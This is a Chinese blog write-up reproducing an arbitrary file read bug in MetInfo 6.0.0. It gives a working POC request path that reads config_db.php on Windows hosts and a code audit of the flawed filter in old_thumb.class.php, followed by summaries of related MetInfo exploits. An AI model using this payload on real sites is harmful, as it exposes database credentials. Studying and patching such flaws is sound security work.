[漏洞复现]metinfo6.0.0任意文件读取

最新推荐文章于 2023-11-05 13:19:07 发布
最新推荐文章于 2023-11-05 13:19:07 发布
阅读量132 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feigerger/article/details/132603097
版权

环境:

OS:windows server 2016

WEB SERVER:PHPStudy pro

CMS:MetInfo6.0.0

PHP版本:php5.3.29

环境搭建:

下载metinfo6.0.0源码包

地址:MetInfo历史版本与文件

解压源码包并且初始化网站

漏洞点:

/include/thumb.php

POC

/include/thumb.php?dir=http\..\..\config\config_db.php

注意:该POC仅在windows环境中生效

代码审计

打开源码包,找到app/system/include/module/old_thumb.class.php

$dir = str_replace(array('../','./'), '', $_GET['dir']);
​
​
        if(substr(str_replace($_M['url']['site'], '', $dir),0,4) == 'http' && strpos($dir, './') === false){
            header("Content-type: image/jpeg");
            ob_start();
            readfile($dir);
            ob_flush();
            flush();
            die;
        }

接收到了get提交的参数dir,并且将字符.././进行了替换

if语句中,又将检查字符串的前4个字符是否等于http且是否包含./字符,如果是,则返回false

所以我们在payload中使用..\字符串用来避开检测,这也就是为什么只能在windows服务器生效的原因

Fredg0n
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
metinfo_6.0.0 任意文件读取漏洞复现
薛定谔嘚喵博客
05-04 914
MetInfo是一套使用PHP和Mysql开发的内容管理系统。MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件
文件读取漏洞复现Metinfo 6.0.0)
m0_56578216的博客
08-31 857
安装phpstudy,下载MetInfo 6.0.0版本软件,复制到phpstudy目录下的www目录中。
MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较)1
08-03
MetInfo7.5.0代码审计(后台SQL注入+md5弱类型比较)1
Metinfo v6.0.0 后台getshell
公众号shadow sock7
10-21 3698
这个漏洞在v5.3.19同样存在,不过前提是需要后台管理员的权限。但是如果是在v5.3.19,可以结合之前的管理员任意密码重置漏洞getshell。 Metinfo v5.3.19: 如文章中所说,这里的poc是: http://localhost/admin/column/save.php? name=123 &action=editor &foldername=upload &...
metinfo 6.0.0任意文件读取漏洞复现
SUPER131110的博客
09-01 330
设置了过滤条件,但是只设置了过滤"../"和“./”和请求头部是“http”开始,这样的过滤显然太简单了,我们可以用.\进行绕过构造payload。- 涉及的版本或软件(CMS版本、浏览器版本等)dir直接由_GET[‘dir’]传递进来。重现攻击过程所需的 payload。metinfo任意文件读取漏洞。简要解释漏洞产生的原因。打补丁,升级,上设备。
metinfo_6.0.0_file-read 任意文件读取漏洞复现
qq_45953122的博客
08-31 399
MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 6.0.0 ~ 6.1.0 版本中的 /app/system/include/module/old_thumb.class.php 文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件
metinfo 后台sql注入1
08-03
本文将深入探讨MetInfo 6.1.0版本中的一个SQL注入漏洞,该漏洞存在于app/system/feedback/admin/feedback_admin.class.php文件的第620行。 SQL注入是一种常见的网络安全威胁,攻击者通过输入恶意的SQL代码,欺骗...
MetInfo模板文件结构与概况详解
08-04
### MetInfo模板文件结构与概况详解 #### 一、引言 MetInfo是一款广泛应用于企业网站建设的CMS(Content Management System)系统,它以其强大的功能、易用性以及灵活性深受用户的喜爱。为了帮助开发者更好地理解并...
MetInfo 企业建站系统 v5.3.16
12-01
**MetInfo 企业建站系统 v5.3.16** MetInfo 是一款专为企业建站设计的内容管理系统(CMS),其v5.3.16版本具有诸多优势,深受新手和有一定PHP基础的开发者喜爱。该系统以轻量级、易用性著称,为快速搭建专业的企业...
MetInfo短信插件_MetInfo短信接口开发_MetInfo短信发送设置
01-07
MetInfo是一款功能强大的企业网站管理系统,它为企业提供了一站式的建站解决方案。在这个主题中,我们主要关注的是MetInfo的短信插件、短信接口开发以及短信发送设置的相关知识点。 一、MetInfo短信插件 MetInfo...
metinfo 6.0 任意文件读取漏洞
浅笑996的博客
12-20 1976
一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\metinfo),点击确定 漏洞分析 1.点击展开左侧app\system\include\module\目录,在弹出的下拉列表中双击old_thumb.class.ph...
记一次MetInfo6.0.0文件包含漏洞复现
weixin_55404107的博客
10-20 1750
进行漏洞复现读取敏感文件
metinfo __ 6.0.0 __ file-read
cgjil的博客
09-12 269
MetInfo 是一套使用PHP 和MySQL 开发的内容管理系统。MetInfo 6.0.0 ~ 6.1.0 版本中的。文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件
漏洞复现Metinfo6.0.0任意文件读取
过期的秋刀鱼
08-31 1851
dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将。漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的。文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件漏洞名称:MetInfo任意文件读取。影响版本:MetInfo 6.0.0。
漏洞复现Metinfo6.0.0任意文件读取漏洞复现
最新发布
过期的秋刀鱼
11-05 401
dir变量接受来自$_GET[‘dir’]传递进来的值,用了str_replace函数做替换,将。漏洞简介:MetInfo是一套使用PHP和MySQL开发的内容管理系统,其中的。文件存在任意文件读取漏洞,攻击者可利用该漏洞读取网站的敏感文件漏洞名称:MetInfo任意文件读取。影响版本:MetInfo 6.0.0。
【学习笔记】 MetInfo 6.0.0 任意文件读取漏洞
chualam的博客
11-02 856
readfile函数(xx) 控制xx里面的内容就可以实现任意读取
MetInfo 任意文件读取漏洞的修复与绕过
Peter 的博客
02-11 2102
漏洞简介 MetInfo是一套使用PHP和Mysql开发的内容管理系统。 MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件漏洞影响 MetInfo 6.0.0 MetInfo 6.1.0 漏洞分析 看到\MetInfo6\app\system\include\module\old_thumb...
metinfo6.0.0文件上传
09-01
根据引用中提到的目录,在南方数据管理系统中存在文件...所以,metinfo文件上传漏洞可以通过南方数据管理系统的数据库备份功能来利用。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值